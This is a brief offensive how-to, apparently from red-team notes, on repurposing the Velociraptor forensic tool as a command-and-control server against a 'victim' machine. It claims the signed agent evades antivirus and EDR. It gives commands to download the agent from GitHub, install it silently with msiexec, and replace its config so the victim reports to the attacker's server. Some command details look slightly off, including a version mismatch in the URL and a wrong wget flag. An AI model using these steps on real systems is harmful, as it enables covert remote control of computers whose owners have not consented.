This need to be run in a privileged shell
Velociraptor is an advanced digital forensic and incident response tool that enhances your visibility into your endpoints. But It can be used as a c2 server too, this is a very convenient tool, because agent are signed by velociraptor so the executable evade all the Antivirus and EDR solutions.
First thing first, deploy the server : https://docs.velociraptor.app/docs/deployment/
Install the agent on the victim
First download and install the official binary
# download the latest version
wget https://github.com/Velocidex/velociraptor/releases/download/v0.6.7-5/velociraptor-v0.6.7-4-windows-amd64.msi -o velociraptor.msi
# install quietly
msiexec.exe /quiet /i velociraptor.msiThen, on the victim computer, edit C:\Program Files\Velociraptor\client.config.yaml and replace it’s content by the client.config.yml previously downloaded on the velociraptor server
Note: if you don’t have any
client.config.yml, then you could generate one on the server with./velociraptor --config ../etc/server.config.yaml config client > ../etc/client.config.yaml. Take a look at https://medium.com/@0D0AResearch/getting-started-with-velociraptor-2f20de22b491
Now you should see your new client on the velociraptor dashboard !
Sources: